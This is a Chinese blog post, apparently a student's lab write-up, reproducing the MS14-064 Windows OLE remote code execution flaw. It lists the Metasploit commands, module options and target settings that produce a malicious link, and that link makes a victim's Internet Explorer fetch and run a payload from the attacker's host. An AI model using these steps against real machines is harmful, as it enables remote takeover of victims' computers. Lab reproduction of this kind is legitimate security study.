MS14-064(OLE远程代码执行漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


一、原理

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。

二、实验环境

攻击机:kali ip:192.168.204.128
靶机:win10 ip:192.168.204.132
工具kali MSF

三、漏洞复现

1、打开kali 进入MSF框架
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nZbZmCAj-1676102178265)(https://secure2.wostatic.cn/static/nGSGP9xvxeWPQ7hyD8oFDP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aPyT3ajMo5s5J8csGFDXZD-0-37e1c01ea05c3679b7773f43336dfa55#id=u4Eej&originHeight=455&originWidth=889&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

2、找到MS14-064漏洞
search ms14-064
use 0
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dTdlDB6m-1676102178265)(https://secure2.wostatic.cn/static/vSjJ9yzxDyNfdPwairQYmP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aFkaivMPKu4HPLNFsyLmF1-0-7e87130296de71318f687cf7494375f7#id=mooVg&originHeight=386&originWidth=890&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

3、查看当前模块参数
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2TxxsIes-1676102178266)(https://secure2.wostatic.cn/static/wQwFm4ZbUEuJM6PazRot4B/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-4Q8eQFX8TQnueitmCS4e65-0-9deb8ac62a1a0568d71437c851b7982b#id=EuouZ&originHeight=575&originWidth=940&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

4、设置参数
set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ucsooNsR-1676102178267)(https://secure2.wostatic.cn/static/bPcbbRkC1Sp8JRUEo1imcU/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-3xEqkZ3vPJPYsb4js9GXFu-0-9508095ec5c244833b5a376258dcfd50#id=FPvA9&originHeight=97&originWidth=762&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

5、查看和设置可攻击目标
show targets
set targets 1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bfVT54dv-1676102178268)(https://secure2.wostatic.cn/static/7qvxRDsxo5bbgauWhAbMww/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-6w3LecAdKpFTrSz46sT1ky-0-caa4f9f9399c382ffd790c5863a1d396#id=ohp3v&originHeight=158&originWidth=859&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

6、执行获得恶意链接
run
exploit
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NIKyr3k0-1676102178268)(https://secure2.wostatic.cn/static/nXHa5z36vCKCRaHUDZaqwe/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-26yRxSZpbNbJgLbS5KpcPe-0-4ec74a005d1c80fcc954491243056c45#id=hhAX0&originHeight=101&originWidth=682&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

恶意链接:
[http://192.168.204.128:8080/9hA6xv](http://192.168.204.128:8080/9hA6xv)

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

就你叫Martin?

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值